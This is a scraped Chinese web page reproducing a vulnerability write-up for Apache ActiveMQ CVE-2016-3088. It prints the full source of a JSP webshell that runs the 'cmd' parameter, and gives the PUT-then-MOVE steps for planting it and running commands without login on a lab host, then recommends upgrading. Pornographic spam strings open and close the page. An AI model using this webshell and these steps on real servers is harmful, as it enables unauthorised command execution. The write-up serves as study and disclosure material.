好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現

Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現

熱門標簽:承德地圖標注公司 地圖標注如何改成微信號 靈圖uu電子寵物店地圖標注 虛假地圖標注 濮陽好的聯通400電話申請 地圖標注黃河的位置 山東企業外呼系統公司 400電話號碼辦理多少錢 百度地圖標注公司位置要多少錢

一、漏洞描述

該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許用戶通過HTTP PUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動到可執行目錄下訪問。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環境搭建

1、官網下載apache-activemq-5.7.0-bin.tar 下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動,進入bin目錄下,運行./activemq start

  

4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環境

  

四、漏洞復現

1、PUT上傳一個jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

  

2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執行權限

  

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑

  

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

  

5、利用該版本存在的未授權訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執行命令

  

五、漏洞防御

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。

---------------------------------------------------------------------------------

參考: https://www.secpulse.com/archives/60064.html

總結

以上所述是小編給大家介紹的Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!

標簽:德宏 安康 福州 樂山 淮安 泰安 上海 鷹潭

巨人網絡通訊聲明:本文標題《Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現》,本文關鍵詞  Apache,ActiveMQ,任意,文件,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現》相關的同類信息!
  • 本頁收集關于Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 女人18毛片A级是什么意思| 日韩黄色视屏| 男女XXOO做爰猛烈| 好男人www免费高清视频在线| 杨颖好深啊再用力一点| 国精产品一区二区三区| 色视频线观看在线播放| 国模人体私拍精品150p| 国产成人综合亚洲欧洲| 美女大尺度色诱热舞视频| 最近中文字幕视频完整版在线看| 生而为欲h| 欧美性xxxxx极品视频| 国产美女裸体秘?无遮挡JK視頻| 多男一女两根一起进去互添H漫画| 一级网站免费个人网站服务器| 好男人手机在线视频-高清中文| 古代野外被强 H男最新章节| 麻花豆传媒一二三产区| 多人交换性69乐园| 欧美人与z0zoxxxx视频| 《色戒》电影在线观看视频| 美国may18_XXXXXL56edu| 色多多污污下载| 九九精品久久久久久噜噜中文| 亚洲欧洲国产成人综合在线| 亚洲性受XiaO77| 很纯很昧h文绿帽版| 丁香激情网| 一区二区高清在线| 天干天干天干天干日天干| 蜜汁肉桃在线阅读| 公车上苏晴被猛烈的进出小说| 亚洲国产成人久久一区二区三区 | writeas竹笋炒肉| 真人一对一免费视频| 扒开腿挺进肉嫩小泬喷水网站| 久久国产精品歌舞团| 日本伦理片在线播放| 女员工的滋味波多野结衣| 纯肉np尿精壶|